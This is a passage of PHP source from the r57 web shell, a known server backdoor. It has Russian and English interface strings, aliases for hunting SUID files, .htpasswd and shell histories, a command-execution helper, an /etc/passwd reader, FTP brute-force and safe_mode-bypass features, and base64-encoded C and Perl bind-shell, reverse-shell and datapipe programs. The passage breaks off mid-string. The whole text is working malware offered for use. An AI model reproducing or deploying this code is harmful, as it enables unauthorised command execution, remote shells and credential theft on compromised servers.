'ru_text38'=>'??????', 'ru_text39'=>'???????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_butt9' =>'????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_butt12'=>'?????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_butt13'=>'???????/???????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>'?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)', 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text77'=>'???????? ????????? ???? ??????', 'ru_text78'=>'?????????? ???????', 'ru_text79'=>'?????????? ???????', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', 'ru_text86'=>'?????????? ????? ? ???????', 'ru_butt14'=>'???????', 'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'FTP-??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????????', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_butt15'=>'?????????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', /* --------------------------------------------------------------- */ 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'back-connect', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Connect', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>' New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_butt5' =>'Run', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Change', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Show', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Table', 'eng_text40'=>'Dump database table', 'eng_butt9' =>'Dump', 'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_butt10'=>'Save', 'eng_text44'=>'Can\'t edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_butt11'=>'Edit file', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_butt12'=>'Find', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_butt13'=>'Create/Delete', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>'Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...', 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text77'=>'Show database structure', 'eng_text78'=>'show tables', 'eng_text79'=>'show columns', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_butt14'=>'Download', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can\'t get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* use username from /etc/passwd for ftp login and password', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Send', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name 'config*'', 'find config* files in current dir'=>'find . -type f -name 'config*'', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = '
:: '; $table_up2 = ' ::
'; $table_up3 = ''; $arrow = ' ?'; $lb = '['; $rb = ']'; $font = ''; $ts = '
'; $table_end1 = '
'; $te = '
'; $fs = '
'; $fe = '
'; if(isset($_GET['users'])) { if(!$users=get_users()) { echo '
'.$lang[$language.'_text96'].'
'; } else { echo '
'; foreach($users as $user) { echo $user.'
'; } echo '
'; } echo '
[ BACK ]
'; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==':') $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ='-'; $unix=1; } else { if(@eregi('^win',$os)) { $windows = 1; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == 'search_text') { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ''; if($found > 0) { $r .= ''; foreach($res as $file=>$v) { $r .= ''; $r .= ''; foreach($v as $a=>$b) { $r .= ''; $r .= ''; $r .= ''; $r .= '\n'; } } $r .= '
'.ws(3); $r .= ($windows)? str_replace('/','\\',$file) : $file; $r .= ''; $r .= '
'.$a.''.ws(2).$b.'
'; echo $r; } else { echo '

'.$lang[$language.'_text56'].'

'; } echo '
[ BACK ]
'; die(); } if(strpos(ex('echo abcr57'),'r57')!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = '-'; } function ws($i) { return @str_repeat(' ',$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join('\n',$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,'r'))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(':',$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=='ru'){ $text = '??????! ?? ???? ???????? ? ???? '; } else { $text = '[-] ERROR! Can't write in file '; } echo '
'.$text.$i.'
'; return null; } function re($i) { if($GLOBALS['language']=='ru'){ $text = '??????! ?? ???? ????????? ???? '; } else { $text = '[-] ERROR! Can't read file '; } echo '
'.$text.$i.'
'; return null; } function ce($i) { if($GLOBALS['language']=='ru'){ $text = '?? ??????? ??????? '; } else { $text = 'Can't create '; } echo '
'.$text.$i.'
'; return null; } function fe($l,$n) { $text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); echo '
'.$text[$l][$n].'
'; return null; } function mr($l,$n) { $text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); $text['eng'] = array('Can\'t send mail','Mail sent'); echo '
'.$text[$l][$n].'
'; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner['execute'] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group['execute'] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world['execute'] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf('%1s', $type); $s.=sprintf('%1s%1s%1s', $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf('%1s%1s%1s', $group['read'], $group['write'], $group['execute']); $s.=sprintf('%1s%1s%1s', $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value) { $ret = ''; return $ret; } function which($pr) { $path = ex('which $pr'); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,'w') or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return ''.$t1.''.$t2.''; } if (!@function_exists('view_size')) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . ' GB';} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . ' MB';} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . ' KB';} else {$size = $size . ' B';} return $size; } } function DirFiles($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (FALSE !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(!is_dir($dir.'/'.$file)) { if($types) { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,@explode(';',$types))) $files[] = $dir.'/'.$file; } else $files[] = $dir.'/'.$file; } } } @closedir($handle); } return $files; } function DirFilesWide($dir) { $files = Array(); $dirs = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) { $file = @strtoupper($file); $dirs[$file] = '<DIR>'; } else $files[$file] = @filesize($dir.'/'.$file); } } @closedir($handle); @ksort($dirs); @ksort($files); $files = @array_merge($dirs,$files); } return $files; } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) $files = @array_merge($files,DirFilesR($dir.'/'.$file,$types)); else { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir.'/'.$file; } else $files[] = $dir.'/'.$file; } } } @closedir($handle); } return $files; } function DirPrintHTMLHeaders($dir) { $pockets = ''; $handle = @opendir($dir) or die('Can't open directory $dir'); echo '
    \n'; while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) { echo '
  • [ $file ]
  • \n'; DirPrintHTMLHeaders($dir.'/'.$file); } else { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,array('.htm','.html'))) { $header = '-=None=-'; $strings = @file($dir.'/'.$file) or die('Can't open file '.$dir.'/'.$file); for($a=0;$a'.$header.'\n'; } } } } echo '
\n'; @closedir($handle); } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(';',$dir); $this->FilesToSearch = Array(); for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b'; $words = '('.@implode($delim,$qq).')'; $pattern = '/'.$words.'/'; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,'\\1',$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(' ',@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c='I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0='; $port_bind_bd_pl='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9'; $back_connect='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=='; $back_connect_c='I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=='; $datapipe_c='I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh 